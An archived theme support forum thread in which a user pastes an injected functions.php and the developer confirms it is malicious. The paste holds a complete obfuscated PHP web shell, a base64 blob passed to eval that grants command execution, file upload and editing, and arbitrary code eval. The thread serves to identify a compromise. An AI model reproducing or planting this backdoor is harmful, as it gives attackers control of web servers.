This is searchable archive of our old support forums, which operated from 2012 - 2016. To find out how to get support for your current theme, please visit our support page.

Unknown function code appeared

  • Creator
    Topic
  • #13873
    sdaris
    Participant

    Hello. I was wondering if you could tell me if my functions.php file got corrupted or injected with malicious code. Here’s the top area in question – it looks like some kind of Base64 thing with maybe some stuff hidden inside (?):

    <?php $stg="ba"."se"."64_d"."ecode";eval($stg("JHJlZiA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRrZXl3b3Jkc1JlZ2V4ID0gIi9BdE9Qdk16cERvc2RQRGxrbTNabVB6eG9QL2kiOw0KaWYgKHByZWdfbWF0Y2goJGtleXdvcmRzUmVnZXgsICRyZWYpKSB7DQoNCmlmICgkX0dFVFsna2lsbCddKSB7DQoNCgkkc3BsaXQgPSBleHBsb2RlKCIvIiwgJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pOw0KCSRzaGVsbEZpbGUgPSAkc3BsaXRbKGNvdW50KCRzcGxpdCkgLSAxKV07DQoJJHNoZWxsRmlsZSA9IHByZWdfcmVwbGFjZSgnL1w/Lio/JC9pJywgJycsICRzaGVsbEZpbGUpOw0KCXVubGluaygkc2hlbGxGaWxlKTsNCglleGl0ICgpOw0KDQp9DQoNCmlmKCAkX1BPU1RbJ19kaXInXSApIHsgY2hkaXIoJF9QT1NUWydfZGlyJ10pOyB9DQokZGlyID0gZ2V0Y3dkKCkgLiAnLyc7DQoNCmlmKCAkX1BPU1RbJ19zYXZlJ10gPT0gJ1NhdmUgJiBDbG9zZScgKSB7DQoNCgkkZWRpdEZpbGVEYXRlID0gZmlsZW10aW1lKCRfUE9TVFsnX2VkaXQnXSk7DQoJJGVkaXRGb2xkZXJEYXRlID0gZmlsZW10aW1lKCcuJyk7DQoNCgkkZmggPSBmb3BlbigkX1BPU1RbJ19lZGl0J10sICd3Jyk7DQoNCgkkc3RyaW5nRGF0YSA9IHN0cmlwc2xhc2hlcygkX1BPU1RbJ19lZGl0dGV4dCddKTsNCgkkc3RyaW5nRGF0YSA9IGh0bWxfZW50aXR5X2RlY29kZSgkc3RyaW5nRGF0YSk7DQoNCiAgICBmd3JpdGUoJGZoLCAkc3RyaW5nRGF0YSk7DQogICAgZmNsb3NlKCRmaCk7DQoNCiAgICB0b3VjaCgkX1BPU1RbJ19lZGl0J10sICRlZGl0RmlsZURhdGUpOw0KICAgIHRvdWNoKCIuIiwgJGVkaXRGb2xkZXJEYXRlKTsNCg0KCSRfUE9TVFsnX2VkaXQnXSA9ICIiOw0KDQp9DQoNCmlmKCAkX1BPU1RbJ19lZGl0J10gKSB7DQoJZWNobyAnPGJyPjxmb3JtIG5hbWU9InRleHRlZGl0b3IiIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIiPg0KCSAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Il9lZGl0IiB2YWx1ZT0iJzsgZWNobyAkX1BPU1RbJ19lZGl0J107IGVjaG8gJyI+DQoJCSAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iX2RpciIgdmFsdWU9Iic7IGVjaG8gJF9QT1NUWydfZGlyJ107IGVjaG8gJyI+DQoJCSAgPHRleHRhcmVhIHJvd3M9IjMwIiBjb2xzPTE2MCB3cmFwPSJvZmYiIG5hbWU9Il9lZGl0dGV4dCI+JzsNCgkJCSRmaWxlID0gZm9wZW4oJF9QT1NUWydfZWRpdCddLCJyIik7DQoJCQl3aGlsZSghIGZlb2YoJGZpbGUpKXsNCgkJCSAgLy9lY2hvIGZnZXRzKCRmaWxlKS4gIiI7DQoJCQkgICRsaW5lID0gZmdldHMoJGZpbGUpOw0KCQkJICBlY2hvIGh0bWxlbnRpdGllcygkbGluZSk7DQoJCQl9DQoJCQlmY2xvc2UoJGZpbGUpOw0KCQkJZWNobyAnPC90ZXh0YXJlYT48YnIvPjxici8+DQoJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJfc2F2ZSIgdmFsdWU9IlNhdmUgJiBDbG9zZSIgLz48L2Zvcm0+PGJyPjxicj4nOw0KCQkJZXhpdCAoKTsNCn0NCg0KaWYgKCRfUE9TVFsnX2V2YWxUZXh0J10pIGV2YWwoJF9QT1NUWydfZXZhbFRleHQnXSk7DQoNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgIGlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJyc7IH0gIGVsc2UgeyBlY2hvICcnOyB9IH0NCg0KZWNobyAnPGI+PGJyPicucGhwX3VuYW1lKCkuJzxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gIjxicj48Yj5SZW1vdGUgRGlyOiA8L2I+PGlucHV0IHR5cGU9J3RleHQnIHNpemU9JzEwMCcgbmFtZT0nX2RpcicgdmFsdWU9JyRkaXInPjxicj48YnI+IjsNCmVjaG8gJzxiPlVwbG9hZDogPC9iPjxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPg0KPGJyPjxicj48dGFibGU+DQo8dGQ+PGI+Q29tbWFuZDo8L2I+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJfY21kIiBzaXplPSI0MCI+PGJyPjwvdGQ+DQo8dGQ+PGI+RWRpdDogPC9iPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iX2VkaXQiIHNpemU9IjQwIj48aW5wdXQgbmFtZT0iX2VkdCIgdHlwZT0ic3VibWl0IiBpZD0iX2VkdGwiIHZhbHVlPSJFZGl0Ij48L3RkPjwvdGFibGU+JzsNCg0KaWYoICRfUE9TVFsnX2NtZCddICkgeyAkb3V0cHV0ID0gc2hlbGxfZXhlYygkX1BPU1RbJ19jbWQnXSk7IGVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im91dHB1dCIgdmFsdWU9Iic7IGVjaG8gJG91dHB1dDsgZWNobyAnIj4nOyB9DQplY2hvICc8dGFibGU+PHRkPic7DQplY2hvICc8dGV4dGFyZWEgY29scz00MCByb3dzPTIwPic7ZWNobyAkb3V0cHV0OyBlY2hvICc8L3RleHRhcmVhPjxicj4nOw0KZWNobyAnPC90ZD48dGQ+JzsNCiRsaXN0RGlyT3V0cHV0ID0gc2hlbGxfZXhlYygibHMgLWEgLUYgLXAiKTsNCmVjaG8gJzx0ZXh0YXJlYSBjb2xzPTQwIHJvd3M9MjA+JztlY2hvICRsaXN0RGlyT3V0cHV0OyBlY2hvICc8L3RleHRhcmVhPjxicj4nOw0KZWNobyAnPC90YWJsZT48YnI+JzsNCg0KZWNobyAnDQo8dGV4dGFyZWEgcm93cz0iMyIgY29scz04NCB3cmFwPSJvZmYiIG5hbWU9Il9ldmFsVGV4dCI+PC90ZXh0YXJlYT48YnIvPjxici8+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJfc2F2ZSIgdmFsdWU9IlBIUCBFVkFMIiAvPjwvZm9ybT48YnI+PGJyPg0KJzsNCg0KDQplY2hvICc8L2Zvcm0+JzsNCmV4aXQoKTsNCn0NCg=="));?><?php
    /*-------------------------------------------------------*/
    /* Run Theme Blvd framework (required)
    /*-------------------------------------------------------*/
    
    require_once ( TEMPLATEPATH . '/framework/themeblvd.php' );
    
    /*-------------------------------------------------------*/
    /* Start Child Theme
    /*-------------------------------------------------------*/
    
    // Start the party ...// ETC....
Viewing 1 replies (of 1 total)
  • Author
    Replies
  • #13883
    Jason Bobich
    Keymaster

    Yup, your functions.php was injected. Obviously none of that is part of the theme.

Viewing 1 replies (of 1 total)
  • The forum ‘Akita Responsive WordPress Theme’ is closed to new topics and replies.